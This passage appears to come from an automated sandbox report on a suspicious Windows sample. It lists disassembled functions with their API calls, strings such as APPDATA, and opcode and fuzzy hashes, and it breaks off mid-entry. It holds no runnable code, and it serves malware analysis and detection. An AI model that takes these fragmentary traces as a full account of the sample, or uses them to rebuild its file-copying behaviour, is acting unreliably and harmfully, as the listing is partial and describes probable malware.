                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFreeHeapLast
                                    • String ID:
                                    • API String ID: 776569668-0
                                    • Opcode ID: 1971d826995e83c42630b7f20a144035cbfa1ea599355b16ba9c1e04bb72f665
                                    • Instruction ID: a645dcc03e9270a835b7b3d3cde82a45d182d579bfb48715c8b6fd79645efaa5
                                    • Opcode Fuzzy Hash: 1971d826995e83c42630b7f20a144035cbfa1ea599355b16ba9c1e04bb72f665
                                    • Instruction Fuzzy Hash: E1F01D32514600ABC664FF6CE8CAC2A73D9FA00720B681809F09DD7541DB34FD85CBA5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0081E23E Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 416fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0082DF41: _Deallocate.LIBCONCRT ref: 0082DF50
                                      • Part of subcall function 0086DB91: EnterCriticalSection.KERNEL32(008B3CAC,?,74714EE0,?,0081416B,008B54D0,00000000), ref: 0086DB9C
                                      • Part of subcall function 0086DB91: LeaveCriticalSection.KERNEL32(008B3CAC,?,0081416B,008B54D0,00000000), ref: 0086DBD9
                                      • Part of subcall function 0086DB47: EnterCriticalSection.KERNEL32(008B3CAC,69494B7C,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB51
                                      • Part of subcall function 0086DB47: LeaveCriticalSection.KERNEL32(008B3CAC,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB84
                                      • Part of subcall function 0086DB47: RtlWakeAllConditionVariable.NTDLL ref: 0086DBFB
                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 0081E687
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                    • String ID: APPDATA$BKZ.$rLWZKMAG@.
                                    • API String ID: 265086031-1647078963
                                    • Opcode ID: 6f099e58d6ee618e7e0b18f5cc0cf41ad67fddc06a59f87c3d7359c811d70b0b
                                    • Instruction ID: b6f4fbc87d8110d7e0d2438594ea9acb43e419249976db74c8e094928f1654a2
                                    • Opcode Fuzzy Hash: 6f099e58d6ee618e7e0b18f5cc0cf41ad67fddc06a59f87c3d7359c811d70b0b
                                    • Instruction Fuzzy Hash: AB028B30D00258DEDB15EBA8D991BDDBBB4FF15300F2441A9E556BB282DB741B88CF62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0083D98B Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 371COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strlen
                                    • String ID: %s-mj%08X
                                    • API String ID: 4218353326-77246884
                                    • Opcode ID: bd984abccb900835f5af2be7a4588a90db6ecb62850265ec6ebcc8f432333618
                                    • Instruction ID: 216eab818bef6bb4f53b2fb7307c581ee6bf5f9c211ea9c6f5b1fc7eead226e3
                                    • Opcode Fuzzy Hash: bd984abccb900835f5af2be7a4588a90db6ecb62850265ec6ebcc8f432333618
                                    • Instruction Fuzzy Hash: F7D101716183019FC714DF28D490A2ABBE5FBC8714F18992EF889DB356DB74D842CB92
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0081F1A2 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 342fileCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0082DF41: _Deallocate.LIBCONCRT ref: 0082DF50
                                      • Part of subcall function 0086DB91: EnterCriticalSection.KERNEL32(008B3CAC,?,74714EE0,?,0081416B,008B54D0,00000000), ref: 0086DB9C
                                      • Part of subcall function 0086DB91: LeaveCriticalSection.KERNEL32(008B3CAC,?,0081416B,008B54D0,00000000), ref: 0086DBD9
                                    • CopyFileA.KERNEL32(?,?,00000000), ref: 0081F4EB
                                      • Part of subcall function 0086DB47: EnterCriticalSection.KERNEL32(008B3CAC,69494B7C,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB51
                                      • Part of subcall function 0086DB47: LeaveCriticalSection.KERNEL32(008B3CAC,?,00814193,008B54D0,0089549D,?,74714EE0,00000000), ref: 0086DB84
                                      • Part of subcall function 0086DB47: RtlWakeAllConditionVariable.NTDLL ref: 0086DBFB
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CriticalSection$EnterLeave$ConditionCopyDeallocateFileVariableWake
                                    • String ID: .$APPDATA$r.
                                    • API String ID: 265086031-2390542981
                                    • Opcode ID: caaa170276f6fc9638ba2f84909a04c15969e25705a2631d883266c51084aba8
                                    • Instruction ID: 9dadb6d0dc93dab81a1b2dc3320d6b3ac31b6146b09365daa2702a6bcbdb3d9e
                                    • Opcode Fuzzy Hash: caaa170276f6fc9638ba2f84909a04c15969e25705a2631d883266c51084aba8
                                    • Instruction Fuzzy Hash: 45E19B30D00258DEDB15EBA8D991BEDBBB4FF14300F2441A9E516B7282DB702B89CB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00812685 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 129COMMON
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: DeallocateH_prolog2
                                    • String ID: ", "$: "
                                    • API String ID: 1002199092-747220369
                                    • Opcode ID: 5d79b8c68f65dad66f795404948ff4f9377549bee2c3b978988a556d2171c617
                                    • Instruction ID: cef1df630c557504b9b1a44fdc759da641f6cc4d162a22d199db9201c70510ef
                                    • Opcode Fuzzy Hash: 5d79b8c68f65dad66f795404948ff4f9377549bee2c3b978988a556d2171c617
                                    • Instruction Fuzzy Hash: 52419271A01219AFDF18EF58D845AAEBBB5FF44300F040569F801EB282D770AD95CB96
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008717A6 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 008717CB
                                    • CatchIt.LIBVCRUNTIME ref: 008718B1
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CatchEncodePointer
                                    • String ID: MOC$RCC
                                    • API String ID: 1435073870-2084237596
                                    • Opcode ID: db159de0b4524548a482b04d193d8be84c582685dac69b85f0d232ebb2ce453f
                                    • Instruction ID: 64d8e843c6f3ac91f83712b34cf2a55d29c61d58b6ac39857c69b79b6b6943d7
                                    • Opcode Fuzzy Hash: db159de0b4524548a482b04d193d8be84c582685dac69b85f0d232ebb2ce453f
                                    • Instruction Fuzzy Hash: 49417832900209AFCF15DF98CC85AAEBBB5FF08304F1881A9F918A7629D335D950DB52
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00862666 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: Mpunct$Getvals
                                    • String ID: $+xv
                                    • API String ID: 455491934-1686923651
                                    • Opcode ID: ac75de8c9650cf4bae8a321540c95e9945c2d154b4e630d315602948cf6738d9
                                    • Instruction ID: d5be2289ac0c37f38d2c35fe8a16b5b1b788ff33c30d5d52fdb960dc3d49015e
                                    • Opcode Fuzzy Hash: ac75de8c9650cf4bae8a321540c95e9945c2d154b4e630d315602948cf6738d9
                                    • Instruction Fuzzy Hash: E721AEB1904A526FDB25DF78C89073BBEE8FB08300F054A5AE499C7A41D734EA11CB91
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088290A Relevance: 6.3, APIs: 4, Instructions: 320COMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _strrchr
                                    • String ID:
                                    • API String ID: 3213747228-0
                                    • Opcode ID: 4f983809a15a7a35b7c6d84a2bf04bc534233e66f7e3f93cdd22ea376eb66f83
                                    • Instruction ID: 348b6ec8eb81d10f7c380074e595a875349570456307916e2ddd4015d94071ba
                                    • Opcode Fuzzy Hash: 4f983809a15a7a35b7c6d84a2bf04bc534233e66f7e3f93cdd22ea376eb66f83
                                    • Instruction Fuzzy Hash: 7CB13532A012569FDB25EF28C881BBEBBF5FF55320F1481AAE845EB341D6349D01CB61
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00871199 Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: AdjustPointer
                                    • String ID:
                                    • API String ID: 1740715915-0
                                    • Opcode ID: eb1217695efe4f242b29b44bb9bd4bd5cf54e524b6d1ae86a2d09859d8457cd9
                                    • Instruction ID: d3713cda144d34c6ce61a9c054e29f1ee2ae5da317423554990d5ff034aa44b3
                                    • Opcode Fuzzy Hash: eb1217695efe4f242b29b44bb9bd4bd5cf54e524b6d1ae86a2d09859d8457cd9
                                    • Instruction Fuzzy Hash: 7051DE72A142069FDF25CF5CD849BAA77B4FF10700F148129ED09D7A9AEB31E980CB90
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00883473 Relevance: 6.1, APIs: 4, Instructions: 132COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 43a5751d71558b8a9793871fbb9a4fd1276b8a2cc121c671d6d6d07f2a1d5dd4
                                    • Instruction ID: f4e60e8703cdcfe98d3db1eab564e7b189e8fa9883200ae21f83d8ecd1c57a0d
                                    • Opcode Fuzzy Hash: 43a5751d71558b8a9793871fbb9a4fd1276b8a2cc121c671d6d6d07f2a1d5dd4
                                    • Instruction Fuzzy Hash: 1241C4B2A00704AFDB25BF7CC841B5ABBE9FB88B24F14856AF115DB281D375DA408785
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088F78E Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • _free.LIBCMT ref: 0088F85E
                                    • _free.LIBCMT ref: 0088F887
                                    • SetEndOfFile.KERNEL32(00000000,0088C3CA,00000000,00880CCF,?,?,?,?,?,?,?,0088C3CA,00880CCF,00000000), ref: 0088F8B9
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,0088C3CA,00880CCF,00000000,?,?,?,?,00000000), ref: 0088F8D5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: _free$ErrorFileLast
                                    • String ID:
                                    • API String ID: 1547350101-0
                                    • Opcode ID: 2779a36487c755a27ab17bfad4b39b2df8042dc15a3eafbada7caa6f4f07518b
                                    • Instruction ID: fb7903d071742df5fb49c9773dbe6f44f572086c547be2520df35d45b1fb610f
                                    • Opcode Fuzzy Hash: 2779a36487c755a27ab17bfad4b39b2df8042dc15a3eafbada7caa6f4f07518b
                                    • Instruction Fuzzy Hash: CD41C5729006059BDB21BBBDCC46B9D7775FF84320F240131F628E7297E634D9449B62
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00887877 Relevance: 6.1, APIs: 4, Instructions: 86COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0087AF9F: _free.LIBCMT ref: 0087AFAD
                                      • Part of subcall function 0088749B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,0088165F,?,00000000,00000000), ref: 0088753D
                                    • GetLastError.KERNEL32 ref: 008878DF
                                    • __dosmaperr.LIBCMT ref: 008878E6
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00887925
                                    • __dosmaperr.LIBCMT ref: 0088792C
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                    • String ID:
                                    • API String ID: 167067550-0
                                    • Opcode ID: 441016519a7e925eb6c40aedc73924c10872cf38853783937f13bfdf0ed0696f
                                    • Instruction ID: c838515a7eed818b62f3f36ea9a51f81f068af7ff87efd0d2d1435a88b2284be
                                    • Opcode Fuzzy Hash: 441016519a7e925eb6c40aedc73924c10872cf38853783937f13bfdf0ed0696f
                                    • Instruction Fuzzy Hash: EB21C871608215AF9B21BF798C8096BBBBCFF443747208525F859D7150E734ED4097A2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008338F9 Relevance: 6.1, APIs: 4, Instructions: 84COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 00832F5C: GetVersionExA.KERNEL32(?), ref: 00832F80
                                    • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000), ref: 00833919
                                    • GetFullPathNameW.KERNEL32(00000000,?,00000000,00000000), ref: 0083393B
                                      • Part of subcall function 00875640: _free.LIBCMT ref: 00875653
                                      • Part of subcall function 00832FF8: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 0083300F
                                      • Part of subcall function 00832FF8: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 00833036
                                    • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00833951
                                    • GetFullPathNameA.KERNEL32(00000000,00000003,00000000,00000000), ref: 0083397B
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: FullNamePath$ByteCharMultiWide$Version_free
                                    • String ID:
                                    • API String ID: 3265977510-0
                                    • Opcode ID: 14aa8fd2299e36abcd3f3d5692445dbcf337d542c42797b20793f74f2c8498fc
                                    • Instruction ID: 0f6e4135a8ed37e9a7254b20310888816ecd1ebbebbbc0b968f98f2b3b316dd9
                                    • Opcode Fuzzy Hash: 14aa8fd2299e36abcd3f3d5692445dbcf337d542c42797b20793f74f2c8498fc
                                    • Instruction Fuzzy Hash: 72110F32505A15BB8B25BBA9DC4ADAF3B6CFFC2760B404029F509DA142DF64CB0182F2
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088049B Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,00872F7E,?,?,?,?,00873E8D,?), ref: 008804A0
                                    • _free.LIBCMT ref: 008804FD
                                    • _free.LIBCMT ref: 00880533
                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00872F7E,?,?,?,?,00873E8D,?), ref: 0088053E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: 99a542e747b41cb637dc46b669c3da8d1cd444f27f74af55a17167dfbd42f3b1
                                    • Instruction ID: 7141df1a8d77cf33363aaea42f3f542b15655710b28b085e16c9f91fd0b5b538
                                    • Opcode Fuzzy Hash: 99a542e747b41cb637dc46b669c3da8d1cd444f27f74af55a17167dfbd42f3b1
                                    • Instruction Fuzzy Hash: C811CA322466096A9691377D6C96E2B225AFBC1375B254335FA2CD21D6EE21CC09CB32
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 00833A3E Relevance: 6.1, APIs: 4, Instructions: 70timeCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetSystemTime.KERNEL32(?), ref: 00833A58
                                    • GetCurrentProcessId.KERNEL32 ref: 00833A79
                                    • GetTickCount.KERNEL32 ref: 00833AA0
                                    • QueryPerformanceCounter.KERNEL32(?), ref: 00833AC9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                    • String ID:
                                    • API String ID: 4122616988-0
                                    • Opcode ID: 120244d5571f9f580ab44cf1f5a370bc18f12cbcc30e9b12a1ff0a0c76a0232e
                                    • Instruction ID: 87f312c5f1b8979db12e6f64a4ac59f00f69e33e7ef2e38e9189573b762621e8
                                    • Opcode Fuzzy Hash: 120244d5571f9f580ab44cf1f5a370bc18f12cbcc30e9b12a1ff0a0c76a0232e
                                    • Instruction Fuzzy Hash: 0E1196B3D1052877DB01EBA8DC899DEB7ACFB48314F454532FA45D7141E531E2488BE1
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 008805F2 Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE
                                    Download Yara Rule
                                    APIs
                                    • GetLastError.KERNEL32(?,?,?,00873CA9,00880149,?,?,0087DA9C), ref: 008805F7
                                    • _free.LIBCMT ref: 00880654
                                    • _free.LIBCMT ref: 0088068A
                                    • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,00873CA9,00880149,?,?,0087DA9C), ref: 00880695
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320358841.0000000000897000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320502317.00000000008B2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.320530346.00000000008B7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_810000_qRsw2oZH24.jbxd
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLast_free
                                    • String ID:
                                    • API String ID: 2283115069-0
                                    • Opcode ID: d0a931f690dc501b584ed7af45a8cfb4233664f6d43257ea514302241b2da959
                                    • Instruction ID: 0dd32fb3bad99ed1d080e72223231ea7ff45e86ca3c9c86432f57857d1786b3a
                                    • Opcode Fuzzy Hash: d0a931f690dc501b584ed7af45a8cfb4233664f6d43257ea514302241b2da959
                                    • Instruction Fuzzy Hash: 4611EC322017086A97A1B77D5C85E272259FBD03B5B244335F928C21D2FD618C19CB21
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Function 0088FAFA Relevance: 6.0, APIs: 4, Instructions: 29COMMON
                                    Download Yara Rule
                                    APIs
                                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0088CC9C,00000000,00000001,00000000,00000000,?,00881B86,00000001,00873AC2,00000000), ref: 0088FB11
                                    • GetLastError.KERNEL32(?,0088CC9C,00000000,00000001,00000000,00000000,?,00881B86,00000001,00873AC2,00000000,00000001,00000000,?,008820DA,00000001), ref: 0088FB1D
                                      • Part of subcall function 0088FAE3: CloseHandle.KERNEL32(FFFFFFFE,0088FB2D,?,0088CC9C,00000000,00000001,00000000,00000000,?,00881B86,00000001,00873AC2,00000000,00000001,00000000), ref: 0088FAF3
                                    • ___initconout.LIBCMT ref: 0088FB2D
                                      • Part of subcall function 0088FAA5: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0088FAD4,0088CC89,00000000,?,00881B86,00000001,00873AC2,00000000,00000001), ref: 0088FAB8
                                    • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,0088CC9C,00000000,00000001,00000000,00000000,?,00881B86,00000001,00873AC2,00000000,00000001), ref: 0088FB42
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.320073655.0000000000811000.00000020.00000001.01000000.00000003.sdmp, Offset: 00810000, based on PE: true
                                    • Associated: 00000000.00000002.320060165.0000000000810000.00000002.00000001.01000000.00000003.sdmpDownload File
